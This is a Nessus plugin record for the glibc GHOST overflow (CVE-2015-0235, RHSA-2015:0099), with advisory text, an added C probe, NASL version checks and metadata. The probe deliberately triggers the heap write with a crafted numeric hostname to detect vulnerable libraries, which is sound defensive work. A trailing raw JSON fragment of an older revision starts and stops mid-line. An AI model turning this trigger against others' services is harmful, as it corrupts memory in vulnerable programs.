ID REDHAT-RHSA-2015-0099.NASL Type nessus Reporter Tenable Modified 2018-12-27T00:00:00
Description
Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.
Red Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)
Red Hat would like to thank Qualys for reporting this issue.
All glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
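The plugin above decides by package version; the probe below is an added example (not part of the advisory or of Tenable's plugin) that tests the glibc actually mapped into a process. It assumes a glibc-based system; the 1024-byte buffer and the canary string are arbitrary choices. It builds an all-digit hostname sized so that the flawed size calculation in __nss_hostname_digits_dots(), which left out the sizeof(char *) needed for the alias pointer, just fits the caller's buffer, then calls gethostbyname_r() and checks whether the canary placed directly after that buffer was overwritten. A fixed glibc refuses the request with ERANGE and leaves the canary intact; the vulnerable one writes sizeof(char *) bytes past the end. The buffer here is static rather than heap-allocated, which is enough to observe the same out-of-bounds write.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CANARY "in_the_coal_mine"   /* arbitrary marker, chosen for this example */

enum ghost_result {
    GHOST_PATCHED = 0,       /* gethostbyname_r() returned ERANGE, canary intact */
    GHOST_VULNERABLE = 1,    /* canary after the buffer was overwritten */
    GHOST_INDETERMINATE = 2  /* canary intact but no ERANGE (non-glibc libc, etc.) */
};

/* Caller-supplied buffer immediately followed by a canary that an
   sizeof(char *) overrun of the buffer would clobber. */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp;

/* Runs the GHOST trigger once against the libc of the current process. */
enum ghost_result ghost_probe(void)
{
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    char name[sizeof(temp.buffer)];

    /* The flawed size_needed was:
         sizeof(host_addr) [16] + sizeof(h_addr_ptrs) [2 pointers] + strlen(name) + 1
       Pick strlen(name) so that this equals the buffer size exactly; the fixed
       code also adds sizeof(*h_alias_ptr) and therefore rejects the call. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    memset(name, '0', len);       /* digits only: takes the numeric-address path */
    name[len] = '\0';

    memset(temp.buffer, 0, sizeof(temp.buffer));
    memcpy(temp.canary, CANARY, sizeof(CANARY));

    int retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                                 &result, &herrno);

    if (memcmp(temp.canary, CANARY, sizeof(CANARY)) != 0)
        return GHOST_VULNERABLE;
    if (retval == ERANGE)
        return GHOST_PATCHED;
    return GHOST_INDETERMINATE;
}

/* True if the last probe left the canary untouched. */
int ghost_canary_intact(void)
{
    return memcmp(temp.canary, CANARY, sizeof(CANARY)) == 0;
}

int main(void)
{
    static const char *verdict[] = { "not vulnerable (ERANGE)",
                                     "VULNERABLE: canary overwritten",
                                     "indeterminate: no overflow, no ERANGE" };
    enum ghost_result r = ghost_probe();
    printf("CVE-2015-0235 probe: %s\n", verdict[r]);
    return r == GHOST_VULNERABLE ? 1 : 0;
}
```

Because the probe exercises the libc loaded into the process that runs it, it is a useful second check after the package update: updating the glibc RPM replaces the file on disk, but daemons that mapped the old library keep running the vulnerable code until they are restarted (or the host is rebooted), which a version-based check such as this plugin cannot see. On Red Hat systems, `rpm -q --changelog glibc | grep CVE-2015-0235` confirms the backported fix is present in the installed package, and `yum updateinfo list --cve CVE-2015-0235` is the same data the plugin consults through Host/RedHat/yum-updateinfo.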
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2015:0099. The text
# itself is copyright (C) Red Hat, Inc.
#
include("compat.inc");
if (description)
{
script_id(81068);
script_version("1.19");
script_cvs_date("Date: 2018/12/27 10:05:36");
script_cve_id("CVE-2015-0235");
script_xref(name:"RHSA", value:"2015:0099");
script_name(english:"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)");
script_summary(english:"Checks the rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated glibc packages that fix one security issue are now available
for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux
5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced
Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended
Update Support.
Red Hat Product Security has rated this update as having Critical
security impact. A Common Vulnerability Scoring System (CVSS) base
score, which gives a detailed severity rating, is available from the
CVE link in the References section.
The glibc packages provide the standard C libraries (libc), POSIX
thread libraries (libpthread), standard math libraries (libm), and the
Name Server Caching Daemon (nscd) used by multiple programs on the
system. Without these libraries, the Linux system cannot function
correctly.
A heap-based buffer overflow was found in glibc's
__nss_hostname_digits_dots() function, which is used by the
gethostbyname() and gethostbyname2() glibc function calls. A remote
attacker able to make an application call either of these functions
could use this flaw to execute arbitrary code with the permissions of
the user running the application. (CVE-2015-0235)
Red Hat would like to thank Qualys for reporting this issue.
All glibc users are advised to upgrade to these updated packages,
which contain a backported patch to correct this issue."
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2015:0099"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2015-0235"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-headers");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-static");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-utils");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:nscd");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.6");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.9");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.2");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.4");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.5");
script_set_attribute(attribute:"patch_publication_date", value:"2015/01/28");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/29");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! ereg(pattern:"^(5\.6|5\.9|6)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.6 / 5.9 / 6.x", "Red Hat " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
rhsa = "RHSA-2015:0099";
yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
if (!empty_or_null(yum_report))
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : yum_report
);
exit(0);
}
else
{
audit_message = "affected by Red Hat security advisory " + rhsa;
audit(AUDIT_OS_NOT, audit_message);
}
}
else
{ sp = get_kb_item("Host/RedHat/minor_release");
if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
flag = 0;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i686", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-debuginfo-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i686", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-debuginfo-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-debuginfo-common-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-debuginfo-common-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", reference:"glibc-devel-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-devel-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-devel-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-headers-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-headers-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-headers-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"glibc-utils-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"glibc-utils-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"glibc-utils-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"i386", reference:"nscd-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"i386", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"s390x", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL5", sp:"6", cpu:"x86_64", reference:"nscd-2.5-58.el5_6.6")) flag++;
if (rpm_check(release:"RHEL5", sp:"9", cpu:"x86_64", reference:"nscd-2.5-107.el5_9.8")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-debuginfo-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-debuginfo-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-debuginfo-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-debuginfo-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-debuginfo-common-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-debuginfo-common-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-debuginfo-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-debuginfo-common-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-devel-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-devel-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-devel-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-devel-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-headers-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-headers-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-headers-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", reference:"glibc-static-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", reference:"glibc-static-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"i686", reference:"glibc-static-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-static-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"glibc-utils-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"glibc-utils-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"glibc-utils-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"i686", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"i686", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"s390x", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"s390x", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (rpm_check(release:"RHEL6", sp:"4", cpu:"x86_64", reference:"nscd-2.12-1.107.el6_4.7")) flag++;
if (rpm_check(release:"RHEL6", sp:"2", cpu:"x86_64", reference:"nscd-2.12-1.47.el6_2.15")) flag++;
if (rpm_check(release:"RHEL6", sp:"5", cpu:"x86_64", reference:"nscd-2.12-1.132.el6_5.5")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc");
}
}
Record metadata
ID REDHAT-RHSA-2015-0099.NASL Plugin 81068 Family Red Hat Local Security Checks Type nessus Reporter Tenable
Title RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)
Published 2015-01-29 Modified 2018-12-27 Last seen 2019-02-21
CVE CVE-2015-0235
CVSS v2 (record) 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C. Note that the plugin source above rates the same issue AV:N/AC:H/Au:N/C:C/I:C/A:C with temporal E:H/RL:OF/RC:C.
Plugin URL https://www.tenable.com/plugins/index.php?view=single&id=81068
References https://access.redhat.com/errata/RHSA-2015:0099 ; https://access.redhat.com/security/cve/cve-2015-0235
Earlier revision in the record history: plugin version 1.13 (2017-01-06), copyright 2015-2017 Tenable Network Security, Inc., carrying script_osvdb_id(117579), temporal vector E:F/RL:OF/RC:ND, references http://rhn.redhat.com/errata/RHSA-2015-0099.html and https://www.redhat.com/security/data/cve/CVE-2015-0235.html, and an OS match limited to 5.6 / 5.9 / 6.2 / 6.4 / 6.5 (pattern ^(5\.6|5\.9|6\.2|6\.4|6\.5)([^0-9]|$)) rather than all of 6.x. Its description and package checks were otherwise identical to the current source above.
cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-10-29T13:40:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", 
"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "fbd14dc5e84ec1b13df51c1e2718b61ebebf385fcf043ea3cc26345ca081c5ce", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9d330cf761b59ad977d4969a9adbbd24", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "d459846fc4189fab17e65d683fe5fd76", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "f71a9310b57e3fbd55f27df0487eecda", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "4be6681e924fd88f11db24aba9bb65e2", "key": "sourceData"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-12-15T03:59:03", "modified": "2018-12-14T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/12/14 9:50:14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n 